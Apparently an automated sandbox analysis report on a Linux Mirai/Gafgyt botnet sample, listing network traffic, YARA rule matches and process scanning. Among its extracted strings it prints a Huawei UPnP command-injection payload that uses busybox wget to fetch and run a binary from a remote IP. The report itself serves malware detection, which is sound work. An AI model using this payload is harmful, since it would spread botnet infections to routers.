          Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
          Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
          Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
          Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
          Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
          Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
          Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
          Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
          Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
          Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443

          System Summary

          barindex
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Process Memory Space: skyljne.x86_64.elf PID: 6228, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: wgetcurl/bin/busyboxechocatnano/proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverPOST /goform/set_LimitClient_cfg HTTP/1.1
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: skyljne.x86_64.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6228.1.0000000000400000.000000000041d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: Process Memory Space: skyljne.x86_64.elf PID: 6228, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.troj.linELF@0/0@2/0
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/6230/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/6232/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/6231/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/6234/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/6233/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/6235/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/1582/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/3088/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/1579/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/1699/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/skyljne.x86_64.elf (PID: 6230)File opened: /proc/1335/cmdlineJump to behavior
